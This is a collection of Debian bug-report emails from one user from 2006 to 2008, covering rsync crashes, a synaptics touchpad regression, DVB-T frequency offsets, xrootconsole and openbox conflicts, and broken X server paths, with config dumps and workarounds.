Paul Slootman wrote: If i now use an exclude (--exclude='var/log/ntpstats'), it finishes without any problem. You already used that exclude. At least you show you did, although the output is not consistent with that. My mistake, the command-line is wrong. The exclude was not there at the time of the error. As it's almost impossible to get a fix for bugs in the stable distribution, I would like to ask you to try the backport version of 3.0.2, available via http://packages.debian.org/etch-backports/rsync . Alternatively, if you want to help fix this bug in 2.6.9, you could download http://debian.wurtel.net/i386/rsync and use that (it's basically a 2.6.9_2etch2 built without optimization and not stripped). First do "ulimit -c unlimited", and trigger the bug. You should then have a core dump. Then do "gdb /path/to/rsync core" and "bt" to get the stack backtrace. Alternatively make the core dump available to me. Hopefully that would help pin down the cause of the error. I'm gonna try this 2.6.9 version and provide you with the core dump file. Thanks for your help. Laurent -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#476786: rsync fails to transfer /var/log/ntpstats/*
Paul Slootman wrote: Alternatively, if you want to help fix this bug in 2.6.9, you could download http://debian.wurtel.net/i386/rsync and use that (it's basically a 2.6.9_2etch2 built without optimization and not stripped). First do "ulimit -c unlimited", and trigger the bug. You should then have a core dump. Then do "gdb /path/to/rsync core" and "bt" to get the stack backtrace. Alternatively make the core dump available to me. Hopefully that would help pin down the cause of the error. Hi, I did download the executable file provided, and tried to reproduce the bug. I'm unable to make it happen since i'm using the version you provided me. I'll try rsync 3.0.2 from the backports. Laurent -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#461760: xserver-xorg-input-synaptics: Synaptics touchpad completely stops working under gdm, xdm, kdm ... and X (gnome, openbox, kde...)
Julien Cristau wrote: Hi, you reported a problem with the synaptics driver not reporting any events for your touchpad. Can you attach the contents of /proc/bus/input/devices to this bug? Also, please test with the packages from testing (you would need to downgrade your video driver, input drivers and xserver-xorg-core), and if that works please attach the Xorg log. The information so far in this bug only shows that a previous version of synaptics couldn't load with xserver 1.4 due to unresolved symbols, but nothing showing the driver works on your systems, unless I've missed something. Hi, Sorry not to have updated this. I fixed it a long time ago... and forgot. I simply did remove the line: Option "AlwaysCore" from the InputDevice section of /etc/X11/xorg.conf So... more than a bug it seems to be a mistake in my config. No ? Laurent Mattia, do you have an idea about this bug? It's currently one of the few blockers for getting an updated X in testing. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#461760: xserver-xorg-input-synaptics: Synaptics touchpad completely stops working under gdm, xdm, kdm ... and X (gnome, openbox, kde...)
Julien Cristau wrote: That config presumably worked with xserver 1.3, so it'd be better if we didn't break it. Could you rebuild the X server with the following patch, and see if that works (with the AlwaysCore option in your config)? Yes, please send me the modified binary file, and i'll try it. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#478020: dvb-utils: fr-Paris should have an added offset of 167000 for each value
Package: dvb-utils Version: 1.1.1-3 Severity: important Hi, The file should look like that to be able to use "scan" on it: # Paris - France (DVB-T transmitter of the Eiffel tower) # T freq bw fec_hi fec_lo mod transmission-mode guard-interval hierarchy T 474167000 8MHz 2/3 NONE QAM64 8k 1/32 NONE T 498167000 8MHz 2/3 NONE QAM64 8k 1/32 NONE T 522167000 8MHz 2/3 NONE QAM64 8k 1/32 NONE T 562167000 8MHz 2/3 NONE QAM64 8k 1/32 NONE T 586167000 8MHz 3/4 NONE QAM64 8k 1/8 NONE Laurent -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.24-pluton (PREEMPT) Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-1) (ignored: LC_ALL set to fr_FR) Shell: /bin/sh linked to /bin/bash Versions of packages dvb-utils depends on: ii libc6 2.7-8 GNU C Library: Shared libraries ii makedev 2.3.1-87 creates device files in /dev ii udev 0.114-2/dev/ and hotplug management daemo dvb-utils recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#473714: xrootconsole doesn't play nice with openbox anymore
Package: xrootconsole Version: 1:0.5-1.1 Severity: important Hi, Since i dist-upgraded two of my sid boxes, i'm unable on those machines to right click on the desktop. When i do so, no menu appears. If i reduce xrootconsole i can click outside of it (not very practical). contents of .xsession: xrootconsole -geo 266x120+0+0 /dev/xconsole -fn 6X10 --wrap & exec openbox contents of xorg.conf: Section "Extensions" Option "Composite" "Enable" EndSection Section "ServerLayout" Identifier "XFree86 Configured" Screen 0 "Screen0" 0 0 InputDevice"Keyboard0" "CoreKeyboard" InputDevice"USB Mouse" "CorePointer" EndSection Section "Files" FontPath"/usr/share/fonts/X11/misc:unscaled" FontPath"/usr/share/fonts/X11/misc" FontPath"/usr/share/fonts/X11/75dpi:unscaled" FontPath"/usr/share/fonts/X11/75dpi" FontPath"/usr/share/fonts/X11/100dpi:unscaled" FontPath"/usr/share/fonts/X11/100dpi" FontPath"/usr/share/fonts/X11/PEX" FontPath"/usr/share/fonts/X11/Type1" FontPath"/usr/share/fonts/ttf/western" FontPath"/usr/share/fonts/ttf/decoratives" FontPath"/usr/share/fonts/truetype" FontPath"/usr/share/fonts/truetype/openoffice" FontPath"/usr/share/fonts/truetype/ttf-bitstream-vera" FontPath"/usr/share/fonts/latex-ttf-fonts" FontPath"/usr/local/share/fonts/truetype" FontPath"/usr/share/fonts/X11/defoma/CID" FontPath"/usr/share/fonts/X11/defoma/TrueType" FontPath"unix/:7100" EndSection Section "Module" Load "ddc" # ddc probing of monitor Load "bitmap" Load "dbe" Load "extmod" Load "glx" Load "type1" Load "freetype" Load "record" Load "int10" Load "vbe" EndSection Section "ServerFlags" Option "AllowMouseOpenFail" "true" Option "Xinerama" "false" EndSection Section "InputDevice" Identifier "Keyboard0" Driver "kbd" Option "CoreKeyboard" Option "XkbRules" "xfree86" Option "XkbModel" "pc105" Option "XkbLayout" "fr" EndSection Section "InputDevice" Identifier "USB Mouse" Driver "mouse" Option "Device" "/dev/input/mice" Option "SendCoreEvents" "true" Option "Protocol" "IMPS/2" Option "ZAxisMapping" "4 5" Option "Buttons" "5" EndSection Section "Monitor" Identifier "Monitor0" VendorName "DEL" ModelName "DELa00b" HorizSync 31.0 - 80.0 VertRefresh 56.0 - 75.0 Option "DPMS" "true" EndSection Section "Monitor" Identifier "Monitor1" VendorName "DEL" ModelName "DELa00c" HorizSync 31.0 - 80.0 VertRefresh 56.0 - 75.0 Option "DPMS" "true" EndSection Section "Device" Identifier "nvidia" Driver "nvidia" VendorName "nVidia Corporation" Screen 0 EndSection Section "Screen" Identifier "Screen0" Device "nvidia" Monitor"Monitor0" DefaultDepth24 Option "TwinView" "on" Option "MetaModes" "1600x1200,1600x1200; 1280x1024,1280x1024; 1024x768,1024x768; 800x600,800x600" Option "TwinViewOrientation" "RightOf" Option "SecondMonitorHorizSync" "UseEdidFreqs" Option "SecondMonitorVertRefresh" "UseEdidFreqs" Option "RenderAccel" Option "AddARGBGLXVisuals" "True" Option "HWcursor" Option "CursorShadow" Option "CursorShadowAlpha" "32" Option "CursorShadowXOffset" "3" Option "CursorShadowYOffset" "3" Option "AllowGLXWithComposite" SubSection "Display" Depth 1 Modes "1600x1200" EndSubSection SubSection "Display" Depth 4 Modes "1600x1200" EndSubSection SubSection "Display" Depth 8 Modes "1600x1200" EndSubSection SubSection "Display" Depth 15 Modes "1600x1200" EndSubSection SubSection "Display" Depth 16 Modes "1600x1200" EndSubSection SubSection "Display" Depth 24 Modes "1600x1200" EndSubSection SubSection "Display" Depth 32 Modes "1600x1200" EndSubSection EndSection Thanks Laurent -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'),
Bug#473715: openbox & xrootconsole don't play nice anymore
Package: openbox Version: 3.4.6.1-2 Severity: important Hi, Since i dist-upgraded two of my sid boxes, i'm unable on those machines to right click on the desktop. When i do so, no menu appears. If i reduce xrootconsole i can click outside of it (not very practical). contents of .xsession: xrootconsole -geo 266x120+0+0 /dev/xconsole -fn 6X10 --wrap & exec openbox contents of xorg.conf: Section "Extensions" Option "Composite" "Enable" EndSection Section "ServerLayout" Identifier "XFree86 Configured" Screen 0 "Screen0" 0 0 InputDevice"Keyboard0" "CoreKeyboard" InputDevice"USB Mouse" "CorePointer" EndSection Section "Files" FontPath"/usr/share/fonts/X11/misc:unscaled" FontPath"/usr/share/fonts/X11/misc" FontPath"/usr/share/fonts/X11/75dpi:unscaled" FontPath"/usr/share/fonts/X11/75dpi" FontPath"/usr/share/fonts/X11/100dpi:unscaled" FontPath"/usr/share/fonts/X11/100dpi" FontPath"/usr/share/fonts/X11/PEX" FontPath"/usr/share/fonts/X11/Type1" FontPath"/usr/share/fonts/ttf/western" FontPath"/usr/share/fonts/ttf/decoratives" FontPath"/usr/share/fonts/truetype" FontPath"/usr/share/fonts/truetype/openoffice" FontPath"/usr/share/fonts/truetype/ttf-bitstream-vera" FontPath"/usr/share/fonts/latex-ttf-fonts" FontPath"/usr/local/share/fonts/truetype" FontPath"/usr/share/fonts/X11/defoma/CID" FontPath"/usr/share/fonts/X11/defoma/TrueType" FontPath"unix/:7100" EndSection Section "Module" Load "ddc" # ddc probing of monitor Load "bitmap" Load "dbe" Load "extmod" Load "glx" Load "type1" Load "freetype" Load "record" Load "int10" Load "vbe" EndSection Section "ServerFlags" Option "AllowMouseOpenFail" "true" Option "Xinerama" "false" EndSection Section "InputDevice" Identifier "Keyboard0" Driver "kbd" Option "CoreKeyboard" Option "XkbRules" "xfree86" Option "XkbModel" "pc105" Option "XkbLayout" "fr" EndSection Section "InputDevice" Identifier "USB Mouse" Driver "mouse" Option "Device" "/dev/input/mice" Option "SendCoreEvents" "true" Option "Protocol" "IMPS/2" Option "ZAxisMapping" "4 5" Option "Buttons" "5" EndSection Section "Monitor" Identifier "Monitor0" VendorName "DEL" ModelName "DELa00b" HorizSync 31.0 - 80.0 VertRefresh 56.0 - 75.0 Option "DPMS" "true" EndSection Section "Monitor" Identifier "Monitor1" VendorName "DEL" ModelName "DELa00c" HorizSync 31.0 - 80.0 VertRefresh 56.0 - 75.0 Option "DPMS" "true" EndSection Section "Device" Identifier "nvidia" Driver "nvidia" VendorName "nVidia Corporation" Screen 0 EndSection Section "Screen" Identifier "Screen0" Device "nvidia" Monitor"Monitor0" DefaultDepth24 Option "TwinView" "on" Option "MetaModes" "1600x1200,1600x1200; 1280x1024,1280x1024; 1024x768,1024x768; 800x600,800x600" Option "TwinViewOrientation" "RightOf" Option "SecondMonitorHorizSync" "UseEdidFreqs" Option "SecondMonitorVertRefresh" "UseEdidFreqs" Option "RenderAccel" Option "AddARGBGLXVisuals" "True" Option "HWcursor" Option "CursorShadow" Option "CursorShadowAlpha" "32" Option "CursorShadowXOffset" "3" Option "CursorShadowYOffset" "3" Option "AllowGLXWithComposite" SubSection "Display" Depth 1 Modes "1600x1200" EndSubSection SubSection "Display" Depth 4 Modes "1600x1200" EndSubSection SubSection "Display" Depth 8 Modes "1600x1200" EndSubSection SubSection "Display" Depth 15 Modes "1600x1200" EndSubSection SubSection "Display" Depth 16 Modes "1600x1200" EndSubSection SubSection "Display" Depth 24 Modes "1600x1200" EndSubSection SubSection "Display" Depth 32 Modes "1600x1200" EndSubSection EndSection Thanks Laurent -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500
Bug#476786: rsync fails to transfer /var/log/ntpstats/*
Paul Slootman wrote: Is there any further news on this? If it doesn't happen anymore, I'd like to close the bug. Hi, Seems fixed with either the latest backports or the sid version. Thanks Laurent -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#461760: xserver-xorg-input-synaptics: Synaptics touchpad completely stops working under gdm, xdm, kdm ... and X (gnome, openbox, kde...)
Package: xserver-xorg-input-synaptics Version: 0.14.7~git20070706-2 Severity: grave Justification: renders package unusable Hi, I did just dist-upgrade my laptop running sid and did experience a touchpad problem. After rebooting, my touchpad no longer works. If I plug a USB mouse, the USB mouse works fine (the touchpad is still non-working). I tried to downgrade the xserver-xorg-input-synaptics, restart gdm and my touchpad is working again. - xorg.conf - Section "ServerLayout" Identifier "double" Screen 0"Default Screen" InputDevice"Generic Keyboard" InputDevice"Configured Mouse" InputDevice"Synaptics Touchpad" EndSection Section "Files" # path to defoma fonts FontPath"/usr/share/fonts/X11/misc" FontPath"/usr/X11R6/lib/X11/fonts/misc" FontPath"/usr/share/fonts/X11/cyrillic" FontPath"/usr/X11R6/lib/X11/fonts/cyrillic" FontPath"/usr/share/fonts/X11/100dpi/:unscaled" FontPath"/usr/X11R6/lib/X11/fonts/100dpi/:unscaled" FontPath"/usr/share/fonts/X11/75dpi/:unscaled" FontPath"/usr/X11R6/lib/X11/fonts/75dpi/:unscaled" FontPath"/usr/share/fonts/X11/Type1" FontPath"/usr/X11R6/lib/X11/fonts/Type1" FontPath"/usr/share/fonts/X11/100dpi" FontPath"/usr/X11R6/lib/X11/fonts/100dpi" FontPath"/usr/share/fonts/X11/75dpi" FontPath"/usr/X11R6/lib/X11/fonts/75dpi" FontPath"/var/lib/defoma/x-ttcidfont-conf.d/dirs/TrueType" FontPath"unix/:7100" EndSection Section "Module" Load "i2c" Load "bitmap" Load "ddc" Load "extmod" Load "freetype" Load "type1" Load "int10" Load "vbe" Load "dri" Load "glx" Load "v4l" Load "dbe" EndSection Section "InputDevice" Identifier "Generic Keyboard" Driver "kbd" Option "CoreKeyboard" Option "XkbRules" "xorg" Option "XkbModel" "pc105" Option "XkbLayout" "fr" Option "XkbVariant" "latin9" EndSection Section "InputDevice" Identifier "Configured Mouse" Driver "mouse" Option "CorePointer" Option "Device" "/dev/input/mice" Option "Protocol" "ImPS/2" Option "Emulate3Buttons" "true" EndSection Section "InputDevice" Identifier "Synaptics Touchpad" Driver "synaptics" Option "SendCoreEvents" "true" Option "Device" "/dev/psaux" Option "Protocol" "auto-dev" # Option "HorizScrollDelta" "0" Option "AlwaysCore" #Option "Protocol" "event" Option "LeftEdge" "120" Option "RightEdge" "930" Option "TopEdge" "120" Option "BottomEdge" "700" Option "FingerLow" "14" Option "FingerHigh" "15" Option "MaxTapTime" "180" Option "MaxTapMove" "110" Option "ClickTime" "0" Option "EmulateMidButtonTime" "75" Option "VertScrollDelta" "10" Option "HorizScrollDelta" "0" Option "MinSpeed" "0.45" Option "MaxSpeed" "0.75" Option "AccelFactor" "0.020" Option "EdgeMotionMinSpeed" "200" Option "EdgeMotionMaxSpeed" "200" Option "UpDownScrolling" "1" Option "CircularScrolling" "0" Option "CircScrollDelta" "0.1" Option "CircScrollTrigger" "2" Option "RTCornerButton" "2" Option "RBCornerButton" "3" Option "TapButton2" "2" Option "SHMConfig" "true" EndSection # LFP - Local Flat Panel - Ecran du portable Section "Monitor" Identifier "VaioFlatPanel" Option "DPMS" ModelName "Vaio Flat Panel 1280x800" EndSection # CRT - Ecran CRT sur la sortie VGA Section "Monitor" Identifier "SonyFlatPanel" VendorName "Sony" # Monitor preferred modeline (60.0 Hz vsync, 64.0 kHz hsync, ratio 5/4) ModeLine "1280x1024" 108 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync HorizSync 28-64 VertRefresh 43-60 EndSection # Carte graphique i945 - Intel Section "Device" Identifier "device1" Driver "i810" BusID "PCI:0:2:0" VendorName "Intel Corp." BoardName "Intel 915" VideoRam131072 Screen 0 Option "DPMS" Option "May_Need_ForceBIOS" "1" Option "XaaNoOffscreenPixmaps" "1" Option "AccelMethod" "EXA" Option "VBERestore" "true" Option "BackingStore" "true" Option "NoAccel" "false" Option "DRI" "true" Option "MonitorLayout" "CRT,LFP" Option "Clone" "true" Option "VideoRam" "65536" Option "CacheLines" "1980"
Bug#461760: xserver-xorg-input-synaptics: Synaptics touchpad completely stops working under gdm, xdm, kdm ... and X (gnome, openbox, kde...)
Mattia Dongili wrote: while the non-working has everything in place. What does synclient -l neptune:~# synclient -l Parameter settings: LeftEdge= 120 RightEdge = 930 TopEdge = 120 BottomEdge = 700 FingerLow = 14 FingerHigh = 15 FingerPress = 256 MaxTapTime = 180 MaxTapMove = 110 MaxDoubleTapTime= 180 SingleTapTimeout= 180 ClickTime = 0 FastTaps= 0 EmulateMidButtonTime= 75 EmulateTwoFingerMinZ= 257 VertScrollDelta = 10 HorizScrollDelta= 0 VertEdgeScroll = 1 HorizEdgeScroll = 1 CornerCoasting = 0 VertTwoFingerScroll = 0 HorizTwoFingerScroll= 0 MinSpeed= 0.45 MaxSpeed= 0.75 AccelFactor = 0.02 TrackstickSpeed = 40 EdgeMotionMinZ = 30 EdgeMotionMaxZ = 160 EdgeMotionMinSpeed = 200 EdgeMotionMaxSpeed = 200 EdgeMotionUseAlways = 0 UpDownScrolling = 1 LeftRightScrolling = 1 UpDownScrollRepeat = 1 LeftRightScrollRepeat = 1 ScrollButtonRepeat = 100 TouchpadOff = 0 GuestMouseOff = 0 LockedDrags = 0 LockedDragTimeout = 5000 RTCornerButton = 2 RBCornerButton = 3 LTCornerButton = 0 LBCornerButton = 0 TapButton1 = 1 TapButton2 = 2 TapButton3 = 3 CircularScrolling = 0 CircScrollDelta = 0.1 CircScrollTrigger = 2 CircularPad = 0 PalmDetect = 1 PalmMinWidth= 10 PalmMinZ= 200 CoastingSpeed = 0 PressureMotionMinZ = 30 PressureMotionMaxZ = 160 PressureMotionMinFactor = 1 PressureMotionMaxFactor = 1 GrabEventDevice = 1 neptune:~# issue with the current xserver-xorg-input-synaptics? Also, do you have any gsynaptics/ksynaptics/qsynaptics installed? no Thanks Laurent -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#458808: netstat-nat segfaults
Package: netstat-nat Version: 1.4.8-1 Severity: grave Justification: renders package unusable Hi, Netstat-nat simply segfaults. - gw:~# netstat-nat Proto NATed Address Destination Address State Segmentation fault gw:~# - Laurent -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.20-a7n-v3 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages netstat-nat depends on: ii libc6 2.7-5 GNU C Library: Shared libraries netstat-nat recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#407788: x11-common init script cause bootup hang when using nss_ldap for LDAP-based user and groups
Hi, I did encounter the same the exactly same problem changing to root:root definitely fixes this issue. Laurent -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#450799: TC_VOIP parameter broken in /usr/share/fiaif/zone_rules.awk
Package: fiaif Severity: important Hi, When enabling TC_VOIP in any zone, an error pops-up stating that this parameter is not valid. After digging in /usr/share/fiaif/zone_rules.awk, we can see a typo: RULE["TC_VIOP"] instead of VOIP Laurent -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.22-p390 (SMP w/4 CPU cores; PREEMPT) Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-1) (ignored: LC_ALL set to fr_FR) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#363106: Openswan, iptables (fiaif) and 2.6.16 kernel problem
Package: fiaif Version: 1.20.1-2 Severity: important Hi, I'm running an openswan gateway for quite a long time now. I have used 2.4.X and 2.6.X kernels without any problem until i decided to upgrade to 2.6.16 kernel. Summary of problem: Under 2.6.15 everything is fine Under 2.6.16 my tunnels establish well, but i can't even ping a single computer located on the other end of the tunnel when the firewall is up. Disabling the firewall solves the problem (but is not an option for me). $ cat ip_conntrack | grep 192.168.10 icmp 1 8 src=192.168.0.192 dst=192.168.10.1 type=8 code=0 id=793 packets=4 bytes=116 [UNREPLIED] src=192.168.10.1 dst=XXX.XXX.XXX.XXX type=0 code=0 id=793 packets=0 bytes=0 mark=0 use=1 192.168.0.0/24 is my lan subnet (natted so that lan computers can access the internet through the public ip address) 192.168.0.192 is a workstation on my lan 192.168.10.0/24 is the other subnet XXX.XXX.XXX.XXX is my public ip address If i disable the nat of 192.168.0.0/24, i can ping the other end. Re-enabling the nat however disables the ability to ping the other end. Seems iptables is trying to nat packets the wrong way :$, or that I missed a major change in 2.6.16. *** Here is the answer from the kernel team: No, it isn't a normal behaviour. Patrick Mchardy ipsec patches were integrated in 2.6.16 and now netfilter properly sees both esp & clear packets. This is a drawback of your firewall/snat rules. Adding it to fiaif.conf solves the problem (post start script): iptables -t nat -I POSTROUTING -s 192.168.0.0/24 -d 192.168.10.0/24 -j ACCEPT -- Package-specific info: -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16-a7n-v3 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages fiaif depends on: hi bash 3.0-15 The GNU Bourne Again SHell hi coreutils5.2.1-2.1 The GNU core utilities ii cron 3.0pl1-94 management of regular background p ii debconf [debconf-2.0]1.4.72 Debian configuration management sy ii debianutils 2.15.5 Miscellaneous utilities specific t ii dnsutils 1:9.3.2-2 Clients provided with BIND ii grep 2.5.1.ds2-4 GNU grep, egrep and fgrep ii iptables 1.3.3-2 Linux kernel 2.4+ iptables adminis ii logtail 1.2.43a Print log file lines that have not ii net-tools1.60-17 The NET-3 networking toolkit ii sed 4.1.4-7 The GNU sed stream editor hi wget 1.10.1-1retrieves files from the web fiaif recommends no packages. -- debconf information: fiaif/cron_logfile: * fiaif/warning: * fiaif/enable_cron: false * fiaif/enable_initd: true -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#363154: xprint: Xprint fails to start and makes X stop
Package: xprint Version: Xprint fails to start Severity: critical Justification: breaks unrelated software Xprint is broken after last sid update Had to add the following line to make it start [ -d /usr/bin ] && XPROJECTROOT=/usr/bin otherwise i'd get: /etc/init.d/xprint start /etc/init.d/xprint: ## FATAL ERROR: Unknown XProjectRoot. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16-pluton-v7 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#363157: x11-common: recent path change breaks kdm & gdm
Package: x11-common Version: 1:7.0.12 Severity: critical Justification: breaks unrelated software GDM & KDM fails to start because they can't find /usr/X11R6/bin/X you have to mkdir /usr/X11R6/bin && ln -s /usr/bin/X /usr/X11R6/bin/X to make it work again. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16-pluton-v7 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages x11-common depends on: ii debconf [debconf-2.0] 1.4.72 Debian configuration management sy ii debianutils 2.15.6 Miscellaneous utilities specific t ii laptop-detect 0.12.1 attempt to detect a laptop ii lsb-base 3.1-3 Linux Standard Base 3.1 init scrip x11-common recommends no packages. -- debconf information: x11-common/xwrapper/allowed_users: Console Users Only x11-common/experimental_packages: x11-common/xwrapper/actual_allowed_users: console x11-common/xwrapper/nice_value/error: x11-common/xwrapper/nice_value: 0 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#363160: gdm: GDM fails to start after Xorg7 update
Package: gdm Version: 2.13.0.10-2 Severity: important GDM fails to start because path of Xserver is hardcoded /usr/bin/X11R6/X instead of using /usr/bin/X -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16-pluton-v7 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages gdm depends on: ii adduser 3.86Add and remove users and groups ii aewm++ [x-window-man 1.1.2-4 minimal window manager written in ii aterm [x-terminal-em 1.0.0-2 Afterstep XVT - a VT102 emulator f ii blackbox [x-window-m 0.70.1-1.1 Window manager for X ii debconf [debconf-2.0 1.4.72 Debian configuration management sy ii enlightenment [x-win 1:0.16.7.2-3The Enlightenment Window Manager ii eterm [x-terminal-em 0.9.3-1 Enlightened Terminal Emulator ii evilwm [x-window-man 0.99.21-1 a minimalist window manager for X1 ii flwm [x-window-manag 1.00-9 Fast Light Window Manager ii fvwm-gnome [x-window 1:2.5.16-2 F(?) Virtual Window Manager, versi ii gksu 1.3.7-1 graphical frontend to su ii gnome-session2.14.0-2The GNOME 2 Session Manager ii gnome-terminal [x-te 2.14.0-1The GNOME 2 terminal emulator appl ii golem [x-window-mana 0.0.5-22A lightweight X11 Window Manager ii icewm [x-window-mana 1.2.25-1wonderful Win95-OS/2-Motif-like wi ii icewm-experimental [ 1.2.25-1wonderful Win95-OS/2-Motif-like wi ii konsole [x-terminal- 4:3.5.2-1 X terminal emulator for KDE ii kwin [x-window-manag 4:3.5.2-1 the KDE window manager ii larswm [x-window-man 7.5.3-5 Lars Window Manager with tiled win ii lesstif-bin [x-windo 1:0.94.4-1.1+b2 user binaries for LessTif ii libart-2.0-2 2.3.17-1Library of functions for 2D graphi ii libatk1.0-0 1.11.4-1The ATK accessibility toolkit ii libattr1 2.4.32-1Extended attribute shared library ii libc62.3.6-7 GNU C Library: Shared libraries ii libcairo21.0.4-1+b1 The Cairo 2D vector graphics libra ii libdmx1 1:1.0.1-2 X11 Distributed Multihead extensio ii libfontconfig1 2.3.2-5.1 generic font configuration library ii libglade2-0 1:2.5.1-2 library to load .glade files at ru ii libglib2.0-0 2.10.2-1The GLib library of C routines ii libgnomecanvas2-02.14.0-1A powerful object-oriented display ii libgtk2.0-0 2.8.17-1The GTK+ graphical user interface ii libpam-modules 0.79-3.1Pluggable Authentication Modules f ii libpam-runtime 0.79-3.1Runtime support for the PAM librar ii libpam0g 0.79-3.1Pluggable Authentication Modules l ii libpango1.0-01.12.1-2Layout and rendering of internatio ii libpopt0 1.7-5 lib for parsing cmdline parameters ii librsvg2-2 2.14.2-1SAX-based renderer library for SVG ii librsvg2-common 2.14.2-1SAX-based renderer library for SVG ii libselinux1 1.30-1 SELinux shared libraries ii libwrap0 7.6.dbs-9 Wietse Venema's TCP wrappers libra ii libx11-6 2:1.0.0-6 X11 client-side library ii libxau6 1:1.0.0-2 X11 authorisation library ii libxcursor1 1.1.5.2-3 X cursor management library ii libxdmcp61:1.0.0-3 X11 Display Manager Control Protoc ii libxext6 1:1.0.0-3 X11 miscellaneous extension librar ii libxi6 1:1.0.0-3 X11 Input extension library ii libxinerama1 1:1.0.1-2 X11 Xinerama extension library ii libxml2 2.6.23.dfsg.2-3 GNOME XML library ii libxrandr2 2:1.1.0.2-3 X11 RandR extension library ii libxrender1 1:0.9.0.2-3 X Rendering Extension client libra ii lsb-base 3.1-3 Linux Standard Base 3.1 init scrip ii metacity [x-window-m 1:2.14.1-1 A lightweight GTK2 based Window Ma ii openbox [x-window-ma 3.2-9 standards compliant, fast, light-w ii oroborus [x-window-m 2.0.18 A lightweight themeable windowmana ii ratpoison [x-window- 1.4.0-beta4-10 Simple window manager with no fat ii rxvt [x-terminal-emu 1:2.6.4-10 VT102 terminal emulator for the X ii sawfish [x-window-ma 1:1.3+cvs20050709-6 a window manager for X11 ii tinywm [x-window-man 1.3-4 tiny window manager ii twm [x-window-manage
Bug#363154: xprint: Xprint fails to start and makes X stop
Drew Parsons wrote: On Mon, 2006-04-17 at 23:13 +0200, Laurent CARON wrote: Package: xprint Version: Xprint fails to start Severity: critical Justification: breaks unrelated software Xprint is broken after last sid update Hi Laurent, did you use reportbug to make this report? Normally it provides the version of the package you're reporting against, but it's missing this time for some reason. Can you tell me what version of xprint you're referring to? Drew Hi, My mistake xprint has been removed by some other broken dependency on SID. sorry for the noise :$. Laurent -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#364273: coreutils: /usr/bin/tail with -F fails to reopen when pointed to a symlink
